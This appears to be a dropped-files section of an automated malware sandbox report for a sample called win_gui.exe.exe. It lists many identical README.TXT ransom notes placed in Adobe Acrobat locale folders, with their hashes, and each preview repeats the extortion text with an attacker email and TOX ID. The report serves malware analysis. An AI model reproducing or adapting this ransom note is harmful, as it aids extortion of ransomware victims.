                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-sl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\tr-tr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-tw\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ar-ae\README.TXT

                                Download File
